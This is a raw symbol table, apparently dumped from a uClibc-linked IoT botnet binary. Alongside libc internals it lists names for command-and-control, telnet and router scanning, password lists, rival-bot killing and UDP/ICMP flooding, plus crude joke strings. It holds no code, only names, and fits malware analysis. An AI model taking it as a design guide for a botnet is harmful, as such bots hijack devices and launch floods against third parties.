__GI___C_ctype_toupper
__GI_fgetc_unlocked
__libc_nanosleep
trim
__GI_fgets_unlocked
dup2
__pthread_mutex_init
tolower
getuid
system
__open_etc_hosts
malloc
isatty
sleep
__GI_atol
vsnprintf
__dns_lookup
__GI_read
__C_ctype_tolower
phonepayload
random_r
__dso_handle
clock_getres
gethostbyname_r
tcpcsum
fdpclose
socket
__GI_dup2
select
_pthread_cleanup_pop_restore
__GI_wcrtomb
__GI___libc_fcntl
D1ckSuckaz
__GI_memset
isspace
__stdio_seek
mempcpy
__GI_strcoll
__GI_write
__ctype_toupper
__libc_read
_string_syserrmsgs
__GI_herror
__GI_open
__GI_strchr
__searchdomain
sigaddset
__GI_tcgetattr
__environ
mmap
wcsnrtombs
makeIPPacket
__GI_inet_ntoa
send
__fgetc_unlocked
abort
__GI_fcntl
__GI_wcsrtombs
__GI_fwrite_unlocked
__GI_getgid
srandom_r
_init
D1ckSucka
__GI_inet_ntoa_r
hostname_to_ip
__GI_setstate_r
parseHex
strtol
pipe
__libc_lseek64
strnlen
rawmemchr
__GI_mempcpy
__malloc_state
__GI___C_ctype_b_data
__sigaddset
nanosleep
__GI_send
h_errno
__pthread_mutex_unlock
wait4
__register_frame_info_bases
__GI_exit
__app_fini
csum
__exit_cleanup
__GI_execl
__GI_srandom_r
__GI___ctype_tolower
write
environ
__GI_close
getBuild
fprintf
__resolv_lock
kill
fputs_unlocked
__pthread_mutex_trylock
TelnetPayload2
__GI_brk
__GI_nanosleep
__GI_strtok
_stdio_openlist
__GI_sigprocmask
inet_addr
ntohl
__GI_fseek
ourIP
chdir
fseeko
_stdio_openlist_del_count
connectTimeout
__raise
setsockopt
bsd_signal
fseek
__GI_kill
__GI_strcmp
CNC_PORT
CommandPayload
__GI_memmove
sendSTD
setstate
__decode_dotted
HackaShit
__stdio_READ
memchr
__GI_toupper
__pthread_initialize_minimal
__GI_recv
__stdin
stdin
__GI_isatty
strcasestr
_start
__deregister_frame_info_bases
strstr
__GI_ioctl
init_rand
rand
signal
read
__decode_header
__GI___h_errno_location
__GI_memcpy
strcoll
StartTheNetis
wcsrtombs
_stdio_user_locking
strncpy
strcasecmp
htonl
sendto
__C_ctype_toupper
__GI___C_ctype_b
__GI_gethostbyname_r
__GI_strncpy
TelnetPayload
__libc_send
PhoneScanner
__GI___xpg_strerror_r
__GI___C_ctype_tolower
CNC_IP
__GI_getrlimit
bcopy
__GI_strcpy
__GI_inet_ntop
strtok
__stdio_adjust_position
malloc_trim
__GI_poll
_vfprintf_internal
__GI_strcasestr
fork
__stdio_rfill
strncat
__GI_sleep
sigaction
__GI_gethostbyname
_dl_phdr
__GI_getc_unlocked
__GI___libc_fcntl64
__uClibc_init
A Santa lives evil at NASA
__GI_munmap
_store_inttype
__length_dotted
__getpagesize
__GI_random
__syscall_error
__uclibc_progname
__GI_getegid
__GI_wait4
__malloc_lock
__uClibc_main
sbrk
__rtld_fini
__GI_fork
strdup
__libc_close
__GI_getpid
inet_aton
index
_pthread_cleanup_push_defer
processCmd
__sigismember
fopen
__bss_start
__libc_open
getOurIP
get_telstate_host
memset
__GI_socket
main
__glibc_strerror_r
listFork
__GI___C_ctype_tolower_data
__stdio_fwrite
negotiate
srand
initstate
fclose
__syscall_rt_sigaction
ntohs
sendUDP
inet_ntoa
tcgetattr
__C_ctype_tolower_data
time
__libc_system
__GI_abort
poll
fdpopen
__GI_fprintf
__get_hosts_byname_r
__stdio_init_mutex
__GI__exit
botkiller
herror
strcmp
advances2
__nameserver
data_start
HackerScan
__GI_sysconf
__h_errno_location
matchPrompt
__C_ctype_b_data
__GI_inet_pton
gethostbyname
_stdio_fopen
_fini
__GI_chdir
__vfork
__GI_mmap
contains_success
sprintf
fdgets
__get_pc_thunk_bx
strerror_r
__GI_select
__libc_waitpid
socket_connect
__GI_waitpid
_stdio_term
__GI_vfprintf
__decode_answer
__GI_signal
stderr
fails
vfork
__C_ctype_b
srandom
ICMPFlood
_ppfs_setargs
__GI_sendto
__GI_sigemptyset
__GI_printf
__libc_fork
LoginPayload
__atexit_lock
scanPid
rand_cmwc
findARandomIP
advances
__libc_fcntl64
getsockopt
__GI_fseeko64
hstrerror
fflush_unlocked
__stdio_wcommit
HackerPrint
contains_string
__GI___fgetc_unlocked
__nameservers
fwrite_unlocked
inet_ntoa_r
__pagesize
_stdio_openlist_add_lock
__GI_getdtablesize
access
_edata
__stdout
__GI_memrchr
__GI_fflush_unlocked
__GI_strstr
__searchdomains
_end
phone
htons
_sigintr
_ppfs_prepargs
__GI_strspn
fgetc_unlocked
initstate_r
PhoneScan
__GI_connect
__curbrk
__libc_poll
_dl_phnum
_fpmaxtostr
__errno_location
uppercase
_stdlib_strto_l
__GI___libc_open
exit
__stdio_WRITE
_stdio_init
__GI_geteuid
inet_ntop
__C_ctype_toupper_data
_dl_aux_init
_errno
atoi
successes
_stdio_openlist_del_lock
__GI_inet_aton
fgets_unlocked
_exit
szprintf
strspn
__libc_recv
__libc_creat
strlen
lseek64
open
toupper
__libc_write
__malloc_consolidate
_ppfs_parsespec
__GI_strtol
__GI_getuid
__GI_strtok_r
__GI_errno
__libc_sendto
__stdio_trans2w_o
__GI_vfork
NetisRanges
strchr
__GI_rawmemchr
__GI_raise
__data_start
setsid
__GI_inet_addr
__encode_dotted
__GI_strnlen
_Jv_RegisterClasses
macAddress
__GI___errno_location
fcntl
Nranges
read_with_timeout
__GI_atoi
fseeko64
__GI_sprintf
__ctype_tolower
wcrtomb
__GI_getsockname
close
Degas are we not drawn onward no In union drawn onward to new eras aged
__libc_connect
passwords
__GI_strlen
pids
sendCNC
vfprintf
strpbrk
_load_inttype
rangechoice
raise
useragents
free
sigprocmask
getsockname
